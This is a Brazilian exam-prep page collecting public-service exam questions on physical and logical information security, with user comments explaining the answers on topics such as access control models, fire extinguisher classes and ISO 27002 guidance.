SóProvas



Questões de Segurança física e lógica


ID
236005
Banca
FGV
Órgão
FIOCRUZ
Ano
2010
Provas
Disciplina
Segurança da Informação
Assuntos

O roubo ou a perda de laptops é atualmente um dos piores problemas para a segurança da informação corporativa. A respeito da segurança da informação em ambientes e equipamentos, considere as afirmativas a seguir.

I. Realizar o inventário de todos os laptops, de forma que possam ser identificados caso sejam recuperados.
II. Criptografar todos os dados sensíveis.
III. Proteger o BIOS com senha.
IV. Em viagens aéreas, enviar o laptop separadamente com a bagagem.

Assinale:

Alternativas
Comentários
  • IV. Em viagens aéreas, enviar o laptop separadamente com a bagagem.

    ai q vc vai perder o laptop mesmo
    hehehe
  • II e III sem sombra de dúvidas ajudam a proteger o equipamento e os dados que contêm.

    IV oposto a isso.

    I. Realizar o inventário de todos os laptops, de forma que possam ser identificados caso sejam recuperados. 
    Mantê-los na base de gerenciamento de configuração é uma boa prática corporativa, no entanto, não adiciona proteção ao equipamento em si ou a seus dados.
  • Concordo totalmente com o Leandro,

    O máximo que você terá com isso, é um histórico do que foi perdido, mas quem roubou já estará de posse da informação!

    Bons estudos!
  • Muito estranho essa de "proteger o bios com senha", se qualquer técnico boqueta sabe remover essa proteção em 5 minutos.
    Mas pensando melhor, por pouquíssimo que seja, ajuda.
  • O erro da alternativa IV corrigido conforme a ISO 27002.

    Segundo a ISO 27002,"9.2.5 Segurança de equipamentos fora das dependências da organização

    Convém que sejam levadas em consideração as seguintes diretrizes para a proteção de equipamentos usados fora das dependências da organização:

    a) os equipamentos e suportes físicos de dados removidos das dependências da organização não fiquem sem supervisão em lugares públicos; os computadores portáteis sejam carregados como bagagem de mão e disfarçados, sempre que possível, quando se viaja;"

  • Gabarito A

    Não vejo necessidade de ser como íten de segurança levar um laptop separadamente com a bagagem em viajens aéreas.

    Vamos na fé !

     

    "Retroceder Nunca Render-se Jamais !"
    Força e Fé !
    Fortuna Audaces Sequitur !


ID
236008
Banca
FGV
Órgão
FIOCRUZ
Ano
2010
Provas
Disciplina
Segurança da Informação
Assuntos

Quanto a supressão de focos de incêndio, assinale a única alternativa que indica a correta relação entre o tipo de fogo e o método de extinção.

Alternativas
Comentários
  • As classes de extintores são:
    Classe A: Incêndio em materiais sólidos cuja queima deixa resíduos ocorrendo em superfície e em profundidade, como madeira, papel, tecidos, borracha. Para esta classe é recomendado o uso de extintores contendo água ou espuma.

    Classe B: Incêndio em líquidos e gases cuja a queima não deixa resíduos e ocorre apenas na superfície, como a gasolina, o álcool, o GLP (gás liquefeito de petróleo). Para esta classe é recomendado o uso de extintores contendo espuma, dióxido de carbono e pó químico.

    Classe C: Incêndio que envolva materiais condutores que estejam potencialmente conduzindo corrente elétrica. Neste caso o agente extintor não pode ser um condutor para não eletrocutar o operador. Para esta classe devem ser utilizados apenas os extintores contendo dióxido de carbono e pó químico.

    Classe D: Incêndio que envolva metais pirofóricos como por exemplo potássio, alumínio, zinco ou titânio. Requerem extintores com agentes especiais que extinguem o fogo por abafamento, como os de cloreto de sódio.

    Fonte: Wikipedia

ID
236011
Banca
FGV
Órgão
FIOCRUZ
Ano
2010
Provas
Disciplina
Segurança da Informação
Assuntos

O verdadeiro efeito que a alta umidade do ar pode causar em equipamentos elétricos é:

Alternativas
Comentários
  • Além de corroer, o excesso de umidade pode gerar condensação, que pode levar a curtos-circuitos.
  • Oxidação também.


ID
236047
Banca
FGV
Órgão
FIOCRUZ
Ano
2010
Provas
Disciplina
Segurança da Informação
Assuntos

Dentre as alternativas abaixo, assinale a única em que um extintor de incêndio Classe C deve ser utilizado no lugar de um extintor de incêndio Classe A.

Alternativas
Comentários
  •      CLASSES DE INCÊNDIOS

    Classe A- são materiais de fácil combustão com a propriedade de queimarem em sua superfície e profundidade, e que deixam resíduos, como: tecidos, madeira, papel, fibras, etc.;

    Classe B- são considerados os inflamáveis os produtos que queimem somente em sua superfície, não deixando resíduos, como óleo, graxas, vernizes, tintas, gasolina, etc.;

    Classe C- quando ocorrem em equipamentos elétricos energizados como motores, transformadores, quadros de distribuição, fios, etc.

    Classe D- elementos pirofóricos como magnésio, zircônio, titânio.

     

    http://www.bauru.unesp.br/curso_cipa/artigos/extintores.htm

  • O item D está correto.

    Porque o único caso em que deve usar o extintor de classe C no lugar de classe A é no caso de fogo em equipamento elétrico.

    a) Espuma (B ou A), Água-Gás (A) ou Dióxido de Carbono (B ou C).
    b) Espuma (B ou A), Dióxido de carbono (B ou C) ou Químico Seco (B ou C).
    c) Mesma da alternativa A.
    d) Dióxido de Carbono (B ou C) ou Químico Seco (B ou C).
    e) Químico seco não pode ser usado em incêndio Classe A.
  • No lugar de Analista de Segurança da Informação estou me sentindo um bombeiro...

    Não entendi a relevância para uma prova, havendo conteúdos tão vastos para explorar.


ID
237544
Banca
CESPE / CEBRASPE
Órgão
ABIN
Ano
2010
Provas
Disciplina
Segurança da Informação
Assuntos

Julgue o  próximo  item , relativo  à salvaguarda de dados, informações, documentos e materiais sigilosos de interesse da segurança da sociedade e do Estado no âmbito da administração pública federal.


Os equipamentos e sistemas utilizados para a produção de documentos com grau de sigilo secreto, confidencial e reservado só podem integrar redes de computadores que possuam sistemas de criptografia e segurança adequados à proteção dos documentos e que sejam física e logicamente isoladas de qualquer outra.

Alternativas
Comentários
  • Acredito que o problema esteja na expressão " e que sejam física e logicamente isoladas de qualquer outra". Dependendo da segurança construida, esse isolamento não é necessário.

  • A questão está errada porque ela mistura os requisitos para equipamentos e sistemas de documentos com grau de sigilo ultra-secreto(art.45 do Decreto 4553/02)  e de documentos com grau de sigilo secreto, confidencial e reservado(art. 47 do Decreto 4553/02). Observe:

     

    "Art. 47. Os equipamentos e sistemas utilizados para a produção de documentos com grau de sigilo secreto, confidencial e reservado poderão integrar redes de computadores que possuam sistemas de criptografia e segurança adequados a proteção dos documentos.

     

    Art. 45. Os equipamentos e sistemas utilizados para a produção de documentos com grau de sigilo ultra-secreto só poderão estar ligados a redes de computadores seguras, e que sejam física e logicamente isoladas de qualquer outra."

  • DESATUALIZADA

    DECRETO Nº 7.845, DE 14 DE NOVEMBRO DE 2012

    Art. 39.  Os equipamentos e sistemas utilizados para a produção de documento com informação classificada em qualquer grau de sigilo deverão estar isolados ou ligados a canais de comunicação seguros, que estejam física ou logicamente isolados de qualquer outro, e que possuam recursos criptográficos e de segurança adequados à sua proteção. 

  • Prezados,

    Essa questão, a época , foi feita com base no decreto 4.553 de 27 de Dezembro de 2002. Esse decreto foi revogado pelo decreto 7.845 de 14 de Novembro de 2012, entretanto a questão continua errada mesmo com o novo decreto.

    Vejamos o que diz o art. 45 e 47 do decreto 4.553 :

     Art. 45. Os equipamentos e sistemas utilizados para a produção de documentos com grau de sigilo ultra-secreto só poderão estar ligados a redes de computadores seguras, e que sejam física e logicamente isoladas de qualquer outra.

     Art. 47. Os equipamentos e sistemas utilizados para a produção de documentos com grau de sigilo secreto, confidencial e reservado só poderão integrar redes de computadores que possuam sistemas de criptografia e segurança adequados a proteção dos documentos.

    Vejamos o que diz o art. 39 do decreto 7.845 :

    Art. 39.  Os equipamentos e sistemas utilizados para a produção de documento com informação classificada em qualquer grau de sigilo deverão estar isolados ou ligados a canais de comunicação seguros, que estejam física ou logicamente isolados de qualquer outro, e que possuam recursos criptográficos e de segurança adequados à sua proteção. 

    Portanto a questão está errada.

  • As informações são classificadas em:

          Ultrassecretos 

          Secretos

          Reservadas


ID
320365
Banca
CESPE / CEBRASPE
Órgão
INMETRO
Ano
2010
Provas
Disciplina
Segurança da Informação
Assuntos

Assinale a opção correta a respeito de segurança da informação, análise de riscos e medidas de segurança física e lógica.

Alternativas
Comentários
  • Gabarito: Letra A

    A análise de riscos é uma técnica de levantamento de informações acerca de processos e sistemas utilizados na empresa de modo a melhorar a governança de ativos de TI em relação às vulnerabilidades que podem ser encontradas, verificando a probabilidade de ocorrência de determinados eventos e as consequências que eles podem trazer para a empresa. https://www.strongsecurity.com.br/blog/analise-de-riscos-em-ti-o-que-e-como-fazer-e-mais/


ID
370708
Banca
FCC
Órgão
TCE-GO
Ano
2009
Provas
Disciplina
Segurança da Informação
Assuntos

Em relação à segurança da informação e aos controles de acesso físico e lógico, considere:

I. Se um usuário não mais faz parte a lista de um grupo de acesso aos recursos de processamento da informação, é certo que o grupo seja extinto com a criação de um novo, contendo os usuários remanescentes.

II. Direitos de acesso (físicos e lógicos) que não foram aprovados para um novo trabalho devem ser retirados ou adaptados, incluindo chaves e qualquer tipo de identificação que associe a pessoa ao novo projeto.

III. O acesso às áreas em que são processadas ou armazenadas informações sensíveis deve ser con- trolado e restrito às pessoas autorizadas, preferencialmente por controles de autenticação, por exemplo, cartão de controle de acesso mais PIN (personal identification number).

Está correto o que se afirma em

Alternativas
Comentários
  • I: Se um usuário não mais faz parte a lista de um grupo de acesso aos recursos de processamento da informação, é certo que o USUÁRIO seja extinto, contendo os usuários remanescentes.


ID
384490
Banca
FCC
Órgão
TRT - 7ª Região (CE)
Ano
2009
Provas
Disciplina
Segurança da Informação
Assuntos

Dentre os ativos que necessitam de adequada proteção, a reputação e a imagem da organização são ativos do tipo

Alternativas
Comentários
  • Em uma corporação, a segurança está ligada a tudo o que manipula direta ou indiretamente a informação (inclui-se aí também a própria informação e os usuários!!!), e que merece proteção. Esses elementos são chamados de ativose podem ser divididos em:
    • tangíveis: informações impressas, móveis, hardware (Ex: impressoras, scanners);
    • Intangíveis: marca de um produto, nome de empresa, confiabilidade de um órgão federal etc;
    • lógicos: informações armazenadas em uma rede, sistema ERP (sistema de gestão integrada) etc;
    • físicos: galpão, sistema de eletricidade, estação de trabalho etc;
    • humanas: funcionários.

    - Os ativos são os elementos que sustentam a operação do negócio e estes sempre trarão consigo VULNERABILIDADES que, por sua vez, submetem os ativos a AMEAÇAS.

    Fonte: Profª Patricia Lima Quintão

     

  • Existem vários tipos de ativos, incluindo:
    a) ativos de informação: base de dados e arquivos, contratos e acordos, documentação de sistema,
    informações sobre pesquisa, manuais de usuário, material de treinamento, procedimentos de suporte
    ou operação, planos de continuidade do negócio, procedimentos de recuperação, trilhas de auditoria e
    informações armazenadas;
    b) ativos de software: aplicativos, sistemas, ferramentas de desenvolvimento e utilitários;
    c) ativos físicos: equipamentos computacionais, equipamentos de comunicação, mídias removíveis e
    outros equipamentos;
    d) serviços: serviços de computação e comunicações, utilidades gerais, por exemplo aquecimento,
    iluminação, eletricidade e refrigeração;
    e) pessoas e suas qualificações, habilidades e experiências;
    f) intangíveis, tais como a reputação e a imagem da organização.

    ISO 27002 p. 21

ID
444079
Banca
CESPE / CEBRASPE
Órgão
TRE-GO
Ano
2009
Provas
Disciplina
Segurança da Informação
Assuntos

Os três tipos de controle de acesso lógico utilizados em segurança de informação são

Alternativas
Comentários
  • Resposta - A

    discretionary access control ou DAC.
    mandatory access control ou MAC.
    RBAC.
  • Controle de acesso discricionário (DAC, discrecional) A política de acesso é determinada pelo proprietário do recurso. As autorizações de acesso são atribuídas diretamente aos usuários.

    Controle de acesso mandatório (MAC, mandatory) A política de acesso é determinada pelo sistema. O proprietário do recurso atribui um rótulo de sensibilidade ao recurso, e o usuário que tiver atribuído a ele um rótulo de sensibilidade igual ou superior ao recurso, tem acesso a ele.

    Controle de acesso baseado em papéis (RBAC, role-based) Direitos e permissões são associados a papéis. O usuário que estiver associado àquele papéis terá acesso ao recurso.

ID
700237
Banca
FUNIVERSA
Órgão
PC-DF
Ano
2012
Provas
Disciplina
Segurança da Informação
Assuntos

A segurança da informação abrange aspectos físicos e lógicos. Alguns equipamentos podem ser utilizados para evitar a ocorrência de incidentes de segurança em ambos os aspectos. A esse respeito, assinale a alternativa que apresenta um tipo de equipamento utilizado para prevenir incidentes de segurança física.

Alternativas
Comentários
  • hehehe! Questão ótima para pegar cidadão afoito. Basta ler "prevenir" que automaticamente já começo a procurar "IPS" nas respostas.

    Enfim. Pode ser facilmente respondida por eliminação (as outras quatro alternativas se referem a aspectos lógicos, não fisicos - e.g. fornecimento de energia elétrica).

  • questão bastante traiçoeira, pois firewall também pode ser um equipamento usado em redes de computadores

  • Complementando os comentários...

    A questão comenta sobre prevenir incidentes físicos (como uma falha de energia), as alternativas exibidas como resposta são para prevenção lógica, exceto o no-break.

    Trecho da questão.

    "A esse respeito, assinale a alternativa que apresenta um tipo de equipamento utilizado para prevenir incidentes de segurança física. " 

  • Gabarito A

    No-break = Falha de energia = Segurança física.

     

    Vamos na fé !

     

     

     

    "Retroceder Nunca Render-se Jamais !"
    Força e Fé !
    Fortuna Audaces Sequitur !


ID
709324
Banca
FCC
Órgão
MPE-PE
Ano
2012
Provas
Disciplina
Segurança da Informação
Assuntos

Em um local que processa informações sensíveis, é importante que seja projetada e aplicada segurança física para escritórios, salas e instalações. Esses locais devem ser protegidos considerando-se uma série de diretrizes, que incluem:

Alternativas
Comentários
  • a)Correto. Quanto menos se souber onde está o setor que armazena os dados mais seguro se está contra atentados que visem a destruição dos equipamentos do sistema.
    b)Errado. Idem o que foi dito anteriormente e ainda, listas telefônicas facilitaria o acesso a pessoas do setor sensível a um possível ataque de engenharia social.
    c)Errado. Primeira parte ok, segunda parte errado pois diz que normas de segurança não são aplicáveis etc.
    d)Errado. Idem comentário da letra "a", além, o público ter direito a acesso a informações não é a mesma coisa que ter direito a acesso aos locais onde estão as informações.
    e)Errado. Equipamentos de contiguência devem estar em locais diferentes, senão, poderão sofrer os mesmo danos que os principais. Imagine que aconteça uma enchente e molha um servidor, se o servidor de backup estiver no mesmo lugar os dois serão destruidos.

ID
726970
Banca
INSTITUTO CIDADES
Órgão
TCM-GO
Ano
2012
Provas
Disciplina
Segurança da Informação
Assuntos

Analise:

I. Segurança física está associada à proteção de recursos através de controles como guardas, iluminação e detectores de movimento.

II. Controle de acesso através de usuário e senha específicos em um determinado software aplicativo pode ser caracterizado como um controle físico.

III. A segurança física está associada ao ambiente e a segurança lógica aos programas.

IV. A segurança lógica deve ocorrer após a segurança física, através de softwares e protocolos.

São corretas as afirmações:

Alternativas
Comentários
  • RESPOSTA CORRETA:    "D"


    I. Segurança física está associada à proteção de recursos através de controles como guardas, iluminação e detectores de movimento.
    CORRETA.

    II. Controle de acesso através de usuário e senha específicos em um determinado software aplicativo pode ser caracterizado como um controle físico.
    ERRADA:
    Esse é um conceito de Segurança Lógica (veja no final do comentário)

    III. A segurança física está associada ao ambiente e a segurança lógica aos programas.
    CORRETA.

    IV. A segurança lógica deve ocorrer após a segurança física, através de softwares e protocolos.
    CORRETA.

    CONCEITOS:

    Segurança Física: A segurança física tem como objetivo proteger equipamentos e informações contra usuários não autorizados, prevenindo o acesso a esses recursos. Ela deve se basear em perímetros predefinidos nas imediações dos recursos computacionais, podendo ser explícita como uma salacofre, ou implícita, como áreas de acesso restrito.

    Segurança Lógica: O objetivo é proteger os dados, programas e sistemas contra tentativas de acessos não autorizados, feitas por usuários ou outros programas. Recursos a serem protegidos: Aplicativos, Arquivos de Dados, Utilitários e Sistemas Operacionais, Arquivos de Senhas, Arquivos de Logs, dentre outros.

    Fonte: http://www.projetoderedes.com.br/aulas/ugb_auditoria_e_analise/ugb_apoio_auditoria_e_analise_de_seguranca_aula_02.pdf. Com acesso em 22/07/2012 às 11:40 h.


ID
771136
Banca
CESPE / CEBRASPE
Órgão
Banco da Amazônia
Ano
2012
Provas
Disciplina
Segurança da Informação
Assuntos

Julgue os itens seguintes, referentes a segurança física e segurança lógica de sistemas.

A segurança lógica é responsável por medidas de controle que permitam que usuários e sistemas acessem informação que esteja explicitamente permitida. Nesse sentido, as etapas de autenticação e autorização são consideradas práticas inadequadas de segurança lógica.

Alternativas
Comentários
  • ERRADO

    controle de acesso, na segurança da informação, é composto dos processos de autenticação, autorização e auditoria (accounting). Neste contexto o controle de acesso pode ser entendido como a habilidade de permitir ou negar a utilização de um objeto (uma entidade passiva, como um sistema ou arquivo) por um sujeito (uma entidade ativa, como um indivíduo ou um processo). A autenticação identifica quem acessa o sistema, a autorização determina o que um usuário autenticado pode fazer, e a auditoria diz o que o usuário fez.


    https://pt.wikipedia.org/wiki/Controle_de_acesso

  • Gabarito Errado

    Segurança física é a forma de proteger equipamentos e informações contra usuários que não possuem autorização para acessá-los. Enquanto segurança lógica é um conjunto de recursos executados para proteger o sistema, dados e programas contra tentativas de acessos de pessoas ou programas desconhecidos.   As duas formas de proteção são essenciais para lidar com as ameaças à informação. Por isso é importante conhecer como cada uma delas é executada e como melhorá-las.

    A autenticação identifica quem acessa o sistema, a autorização determina o que um usuário autenticado pode fazer, e a auditoria diz o que o usuário fez.

     

     

    "Retroceder Nunca Render-se Jamais !"
    Força e Fé !
    Fortuna Audaces Sequitur !

  • ERRADA, pois, autorização diz a respeito por exemplo se um funcionário tem ou não autorização de entrada em uma sala de servidor de backup por exemplo.

    Este tipo de autorização tem relação com segurança física da organização e não a segurança lógica.


ID
771139
Banca
CESPE / CEBRASPE
Órgão
Banco da Amazônia
Ano
2012
Provas
Disciplina
Segurança da Informação
Assuntos

Julgue os itens seguintes, referentes a segurança física e segurança lógica de sistemas.

No processo de identificação de categorias de funcionários em uma organização, é considerada boa prática de segurança física a adoção de mecanismos de identificação que sejam capazes de distinguir funcionários de visitantes e categorias diferenciadas de funcionários, por meio do uso de dispositivos de identificação com uso de sistema de cores.

Alternativas
Comentários
  • Gabarito Certo

    Catracas e crachas são exemplos que podem ser usados nesses requisitos.

     

    Vamos na fé !

     

     

     

    "Retroceder Nunca Render-se Jamais !"
    Força e Fé !
    Fortuna Audaces Sequitur !

  • SE A EMPRESA TÁ COM MALOTE SOBRANDO, POR QUE NÃO?

    CORRETO!


ID
777673
Banca
CESPE / CEBRASPE
Órgão
TRE-RJ
Ano
2012
Provas
Disciplina
Segurança da Informação
Assuntos

Considerando a segurança de ambientes físicos e lógicos bem como controles de acesso, julgue os itens subsecutivos.

Adota-se, para o controle de acesso em ambientes protegidos, a estrutura do tipo que se denomina camadas de cebola, por meio da qual se delimitam várias camadas de proteção, entre as quais a camada central é a mais protegida, procurando-se, ainda, manter em locais com acesso restrito a poucas pessoas as máquinas que não precisem de operador para funcionar.

Alternativas
Comentários
  • Errei a questão por considerar o seguinte trecho como errado: " ...manter em locais com acesso restrito a poucas pessoas as máquinas que não precisem de operador para funcionar."

    Considerei que a classificação dos equipamentos em restritos ou não decorrem do impacto gerado para a empresa pela sua perda ou mal uso, e não de precisarem de operador para funcionar.

  • Segundo Northcutt et. al (2002) propõe que se pense na segurança de uma rede como uma cebola: Quando você descasca a camada mais externa,muitas camadas permanecem por baixo dela.

    Bibliografia:

    http://books.google.com.br/books?id=NCvZWZ4NIbkC&pg=PA19&lpg=PA19&dq=northcutt+2002+cebola&source=bl&ots=oVO_gfMamp&sig=Js48PsS5XljALPSs-RHnFQJO7MI&hl=pt-BR&sa=X&ei=nlG1U-TrPPPisASd0YDIAw&ved=0CBwQ6AEwAA#v=onepage&q=northcutt%202002%20cebola&f=false

  • Prezados ,

    Vendo o livro Segurança em Redes Privadas Virtuais , de Alexandre Guedes, vemos na página 19 que é necessário que se entenda que nenhum componente único poderá garantir um sistema de segurança adequado para uma rede corporativa e que possa defende-la com perfeição contra ataques ( NORTHCUTT et al., 2002 ).

    Northcutt et al. ( NORTHCUTT, 2002 ) propõe que se pense na segurança de uma rede com uma cebola : Quando você descasca a camada mais externa, muitas camadas permanecem por baixo dela.


    A alternativa correta é : CERTO.


  • Gabarito Certo

    Modelo da Cebola: um modelo de níveis de reflexão ou modelo de camadas.

    Vamos na fé !

     

    "Retroceder Nunca Render-se Jamais !"
    Força e Fé !
    Fortuna Audaces Sequitur !


ID
777676
Banca
CESPE / CEBRASPE
Órgão
TRE-RJ
Ano
2012
Provas
Disciplina
Segurança da Informação
Assuntos

Considerando a segurança de ambientes físicos e lógicos bem como controles de acesso, julgue os itens subsecutivos.

Ao se identificar quais seriam as informações que, caso percam a confiabilidade, a integridade e a disponibilidade, trariam prejuízos à organização, e, ao se localizar onde tais informações são processadas e armazenadas, as áreas críticas de informação e os locais que precisam ser protegidos serão determinados.

Alternativas
Comentários
  • Questão pra deixar o candidato confuso, mas a resposta é VERDADEIRA.

  • CERTO.

    A ISO/IEC 27002 define segurança da informação como sendo “preservação da confidencialidade, da integridade e da disponibilidade da informação; adicionalmente, outras propriedades, tais como autenticidade, responsabilidade, não repúdio e confiabilidade, podem estar envolvidas.”

    Os critérios críticos para a segurança da informação são: confidencialidade, integridade, disponibilidade. Entretanto, apesar de a questão ter deixado de fora a confidencialidade, ela está correta, pois não utilizou nenhuma palavra limitadora (apenas, somente), logo também incluiu o critério de confiabilidade.


ID
777679
Banca
CESPE / CEBRASPE
Órgão
TRE-RJ
Ano
2012
Provas
Disciplina
Segurança da Informação
Assuntos

Considerando a segurança de ambientes físicos e lógicos bem como controles de acesso, julgue os itens subsecutivos.

Um perímetro de segurança bem definido e protegido é suficiente para garantir a segurança da informação nas organizações.

Alternativas
Comentários
  • é necessário também acrescentar polícas e consciêntização do usuário
  • Segundo a norma 27002:

    9 Segurança física e do ambiente
     
    9.1 Áreas seguras

    Convém que as instalações de processamento da informação críticas ou sensíveis sejam mantidas em áreas seguras, protegidas por perímetros de segurança definidos, com barreiras de segurança e controles de acesso apropriados. Convém que sejam fisicamente protegidas contra o acesso não autorizado, danos e interferências.

    Além disso, a norma tem outros controles, tais como:

    9.1.1 Perímetro de segurança física
    9.1.2 Controles de entrada física
    9.1.3 Segurança em escritórios, salas e instalações
    9.1.4 Proteção contra ameaças externas e do meio ambiente
    9.1.5 Trabalhando em áreas seguras
    9.1.6 Acesso do público, áreas de entrega e de carregamento


    9.2 Segurança de equipamentos
    9.2.1 Instalação e proteção do equipamento
    9.2.2 Utilidades
    9.2.3 Segurança do cabeamento
    9.2.4 Manutenção dos equipamentos
    9.2.5 Segurança de equipamentos fora das dependências da organização
    9.2.6 Reutilização e alienação segura de equipamentos
    9.2.7 Remoção de propriedade
     
  • Mais um trecho da norma que podemos concluir que somente o perímetro de segurança é insuficiente para garantir uma segurança completa.

    Segundo a ISO 27002,9.1.1 Perímetro de segurança física,"

    Diretrizes para a implementação

    Convém que sejam levadas em consideração e implementadas as seguintes diretrizes para perímetros de segurança física, quando apropriado:

    a) os perímetros de segurança sejam claramente definidos e que a localização e a capacidade de resistência de cada perímetro dependam dos requisitos de segurança dos ativos existentes no interior do perímetro, e dos resultados da análise/avaliação de riscos;"

    -------------------

    **Galera fica a dica, nada em segurança da informação é 100% seguro, o que ocorre, entretanto, é que cada investimento maior em segurança da informação é capaz de potencializar e aumentar o arsenal de segurança em uma organização. Portanto, principalmente em provas do cespe, fiquem atentos em questões de segurança da informação quando surgirem termos como "SÓ, É SUFICIENTE, JÁ BASTA". É grande a chance de uma questão dessa estar errada, e vc ganhar alguns pontinhos extras na prova.

  • Pincipalmente nas provas do Cespe, termos como 'suficiente', 'nunca', 'sempre', 'impossível' etc devem ser analisados com cautela, e normalmente fazem parte de afirmações falsas.

    Vamos na fé. 

  • Gabarito Errada.

    Questão relativamente fácil.

    É claro que não é só isso que vai fazer garantir a segurança da informação nas organizações.

    Vamos na fé !

     

    "Retroceder Nunca Render-se Jamais !"
    Força e Fé !
    Fortuna Audaces Sequitur !


ID
780139
Banca
CESPE / CEBRASPE
Órgão
TRE-RJ
Ano
2012
Provas
Disciplina
Segurança da Informação
Assuntos

Considere que uma organização mantenha em sua estrutura de tecnologia da informação um servidor de arquivos em funcionamento. Nesse contexto, julgue os itens subsequentes acerca
de segurança da informação.

Se as mídias das cópias de segurança são enviadas para outro local, fisicamente distante do servidor de arquivos, pelo menos uma vez a cada cinco dias úteis e tendo em vista que o transporte desses dados é feito por uma empresa terceirizada, uma forma de aumentar a segurança dessa informação é efetuar procedimento para criptografar os dados armazenados nas mídias.

Alternativas
Comentários
  • De fato, caso essas mídias sejam interceptadas de alguma forma e pessoas não autorizadas se apoderem das informações lá contidas, teremos um comprometimento potencial da confidencialidade e integridade. Caso se empregue criptográfia espera-se sanar ou ao menos mitigar o problema que poderia comprometer a integridade. Dessa forma, efetuar procedimento para criptografar os dados armazenados nas mídias aumenta a segurança, pelo menos nesse sentido.
  • Gabarito Certo

    Questão certinha, pois visa a integridade e a confidêncialidade das mídias, mesmo sendo uma empresa terceirizada prestando serviço a empresa que é dona das fitas, todo cuidado é pouco.

     

    "Retroceder Nunca Render-se Jamais !"
    Força e Fé !
    Fortuna Audaces Sequitur !

  • Ibsen , estou na sua aba ! CERTO !

  • SEGURANÇA NUNCA É DEMAIS.


ID
801580
Banca
CESPE / CEBRASPE
Órgão
MEC
Ano
2011
Provas
Disciplina
Segurança da Informação
Assuntos

Julgue os itens seguintes, relacionados a segurança física, segurança
lógica e gestão de risco.

Um sistema de proteção lógica visa impedir que ativos de informação sejam expostos de forma não autorizada. Esses sistemas são compostos por elementos tais como cercas, barreiras, sensores e pessoal de segurança.

Alternativas
Comentários
  • OS exemplos seriam de  proteção física.
  • Segurança Lógica
    A segurança lógica compreende um conjunto de
    medida e procedimentos, adotados pela empresa ou
    intrínsecos aos sistemas utilizados.
     
    O objetivo é proteger os dados, programas e
    sistemas contra tentativas de acessos não
    autorizados, feitas por usuários ou outros
    programas

    Recursos e informações a serem protegidos são:
    
    Aplicativos (Programas fonte e objeto);
     Arquivos de dados;
     Utilitários e Sistema Operacional;
     Arquivos de senha;
     Arquivos de log

    fonte:http://www.projetoderedes.com.br/aulas/ugb_auditoria_e_analise/ugb_apoio_auditoria_e_analise_de_seguranca_aula_02.pdf

    fé e força!!!!
  • Proteção Lógica : Você xinga, assim como os softwares;
    Proteção Física : Você chuta, assim como os hardwares.

    Fazendo essa analogia você não errará nunca mais.

    GAB: ERRADO

ID
801583
Banca
CESPE / CEBRASPE
Órgão
MEC
Ano
2011
Provas
Disciplina
Segurança da Informação
Assuntos

Julgue os itens seguintes, relacionados a segurança física, segurança
lógica e gestão de risco.

Em um sistema de controle de acesso discricionário, o administrador do sistema estabelece os direitos de acesso dos usuários aos recursos disponíveis. Com o uso de listas de controle de acesso, os direitos de acesso são concedidos diretamente pelo dono do recurso.

Alternativas
Comentários
  • O sistema descrito é de acesso mandatório, no qual os direitos são estabelecidos pelo administrador. No acesso discricionário, o próprio proprietário do recurso estabelece os direitos.
  • Controle Discricionários ou baseados em identidade Estes mecanismos controlam individualmente, pelo dono do recurso, e não por uma administração central, quais sujeitos possuem direitos sobre objetos, e quais estes direitos são.
     
    Controle de Acesso Mandatório
    O controle de acesso mandatórioé definido como mecanismos que não são controlados à discrição do usuário, mas, sim, à de um administrador central. Assim, elimina-se o problema de um usuário inadvertidamente reduzir a segurança de acesso a um objeto, e consegue-se uma maior garantia que as políticas estabelecidas serão seguidas, porém ao custo de uma exibilidade grandemente diminuida.
     
    Baseado em papéis O controle de acesso baseado em papéis estão fortemente ligado à função do sujeito dentro de uma organização; cada papel do sujeito está vinculado a um tipo de atividade, e a um conjunto de direitos.
  • A questão descreve o controle de acesso mandatório ou obrigatório (MAC), e por este motivo está incorreta.

  • Seguem os 3 tipos de controles, p/ complemento dos estudos:


    RBAC: Role-Based Access Control

    Possibilita ao administrador de sistema criar papéis, definir permissões para esses papéis e, então, associar usuários para os papéis com base nas responsabilidades associadas a uma determinada atividade.

    DAC: Discretionary Access Control

    DAC é baseado na noção de que usuários individuais são donos de objetos e, portanto, tem controle (discreção) total em quem deve ter permissões para acessar o objeto. Um usuário transforma-se em dono do objeto ao criá-lo.

    MAC: Mandatory Access Control

    Enquanto o ponto-chave do DAC é o fato de que os usuários são considerados donos do objeto e, portanto, responsáveis pelas suas permissões de acesso, o modelo mandatório prevê que usuários individuais não têm escolha em relação a que permissões de acesso eles possuem ou a que objetos podem acessar.

    Nesse modelo, os usuários individuais não são considerados donos dos objetos, e não podem definir suas permissões, isso é realizado pelos administradores do sistema.


  • Em um sistema de controle de acesso discricionário, o administrador do sistema estabelece os direitos de acesso dos usuários aos recursos disponíveis. (ERRADO. Isso ocorre no acesso mandatório). Com o uso de listas de controle de acesso, os direitos de acesso são concedidos diretamente pelo dono do recurso (CORRETO. Isso ocorre no acesso discricionário).


    controle de acesso discricionário (discretionary access control ou DAC) é uma política de controle de acesso determinada pelo proprietário (owner) do recurso (um arquivo, por exemplo). O proprietário do recurso decide quem tem permissão de acesso em determinado recurso e qual privilégio ele tem.

    O DAC tem dois conceitos importantes:

    • 1. Todo objeto em um sistema deve ter um proprietário. A política de acesso é determinada pelo proprietário do recurso. Teoricamente um objeto sem um proprietário é considerado não protegido.
    • 2. Direitos de acesso são estabelecidos pelo proprietário do recurso, que pode inclusive transferir essa propriedade.


    No controle de acesso obrigatório (mandatory access control ou MAC) a política de acesso é determinada pelo sistema e não pelo proprietário do recurso. Este controle é utilizado em sistemas de cujos dados são altamente sensíveis, como governamentais e militares.
  • Reprodução da questão com os pontos INCORRETOS
    Em um sistema de controle de acesso discricionário, o administrador do sistema estabelece os direitos de acesso dos usuários aos recursos disponíveis. Com o uso de listas de controle de acesso, os direitos de acesso são concedidos diretamente pelo dono do recurso.

     

    Reprodução da questão com os pontos CORRETOS
    Em um sistema de controle de acesso discricionário, o proprietário do recurso estabelece os direitos de acesso dos usuários a determinado recurso. Com o uso de listas de controle de acesso, os direitos de acesso são concedidos diretamente pelo dono do recurso.


ID
837454
Banca
CESPE / CEBRASPE
Órgão
ANAC
Ano
2012
Provas
Disciplina
Segurança da Informação
Assuntos

Acerca da segurança de servidores e estações de trabalho, julgue os itens que se seguem.

O OSSEC, um hibrid IDS (HIDS) open source, executa a análise de logs, verifica integridade, monitora o registro (no caso do Windows) e detecta rootkit, além de prover resposta ativa e alerta em tempo real.

Alternativas

ID
837463
Banca
CESPE / CEBRASPE
Órgão
ANAC
Ano
2012
Provas
Disciplina
Segurança da Informação
Assuntos

